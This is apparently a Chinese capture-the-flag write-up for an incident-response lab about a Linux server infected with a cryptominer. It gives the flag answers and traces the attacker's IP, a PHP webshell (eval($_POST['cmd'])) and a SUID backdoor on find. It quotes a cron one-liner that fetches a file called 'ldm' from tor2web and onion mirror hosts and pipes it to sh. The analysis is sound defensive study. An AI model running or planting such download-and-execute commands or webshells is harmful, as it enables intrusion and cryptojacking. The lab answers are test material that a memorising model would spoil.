玄机——第五章 linux实战-挖矿.md

First Post:

Last Update:

练习地址:https://xj.edisec.net/

应急响应工程师在内网服务器发现有台主机 cpu 占用过高,猜测可能是中了挖矿病毒,请溯源分析,提交对应的报告给应急小组
虚拟机账号密码 root websecyjxy web 端口为 8081

1、黑客的IP是? flag格式:flag{黑客的ip地址},如:flag{127.0.0.1}
flag{192.168.10.135}
2、黑客攻陷网站的具体时间是? flag格式:flag{年-月-日 时:分:秒},如:flag{2023-12-24 22:23:24}
flag{2023-12-22 19:08:34}
3、黑客上传webshell的名称及密码是? flag格式:flag{黑客上传的webshell名称-webshell密码},如:flag{webshell.php-pass}
flag{404.php-cmd}
4、黑客提权后设置的后门文件名称是? flag格式:flag{后门文件绝对路径加上名称},如:flag{/etc/passwd}
flag{/usr/bin/find}
5、对黑客上传的挖矿病毒进行分析,获取隐藏的Flag
flag{websec_True@888!}
过程:
寻找网站日志

发现 192.168.10.135 这个ip在扫描目录

然后再后面发现这个ip在访问 /dede 这个目录,由题目可以知道web端口是8081,我们进行访问

发现是一个后台的登录框

进行弱口令登录,发现是用户名:admin 密码:12345678

登录之后,在会员列表-注册会员列表里发现了一个 hacker 用户,登录ip也和扫描目录的ip一致,登录时间就是黑客攻陷网站的具体时间

回到finalshell 打包网站源码,用D盾扫描发现一个木马——404.php

我们运行这个404.php即可看到具体的代码 “eval($_POST[‘cmd’]);”

然后再查看历史命令记录的时候,发现对find命令提高了权限–4775

发现 find 具有suid权限,可能被用作提取

挖矿病毒一般是在定时任务里,我们查看定时任务

根据代码得出——>>(总的来说就是下载一个文件:’ldm’ )

(curl -fsSLk –connect-timeout 26 –max-time 75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm || curl -fsSLk –connect-timeout 26 –max-time 75 https://an7kmd2wp4xo7hpr.d2web.org/src/ldm || curl -fsSLk –connect-timeout 26 –max-time 75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm || wget –quiet –tries=1 –no-check-certificate –connect-timeout=26 –timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm || wget –quiet –tries=1 –no-check-certificate –connect-timeout=26 –timeout=75 https://an7kmd2wp4xo7hpr.d2web.org/src/ldm || wget –quiet –tries=1 –no-check-certificate –connect-timeout=26 –timeout=75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm)) | sh &

  • curl:这是用于在命令行下进行 URL 传输的工具。
  • -fsSLk:这些是 curl 命令的选项:
    • -f:如果请求失败,不显示错误信息。
    • -s:静默模式,不显示进度或错误信息。
    • -S:即使在静默模式下仍显示错误信息。
    • -L:如果服务器返回重定向,自动跟随重定向。
    • -k:忽略 SSL 证书验证。
  • –connect-timeout 26:设置连接超时时间为 26 秒,即在 26 秒内建立连接,否则超时。
  • –max-time 75:设置最大传输时间为 75 秒,即在 75 秒内完成整个传输过程,否则超时。
  • https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm:这是要下载的文件的 URL,指向 tor2web.su 域名下的 src/ldm 文件。

使用find命令查找一下ldm文件,发现在/etc/.cache/ldm

打开ldm文件,发现在第691行的代码有点奇怪,进行base64解密,发现flag

reward
支付宝 | Alipay
微信 | Wechat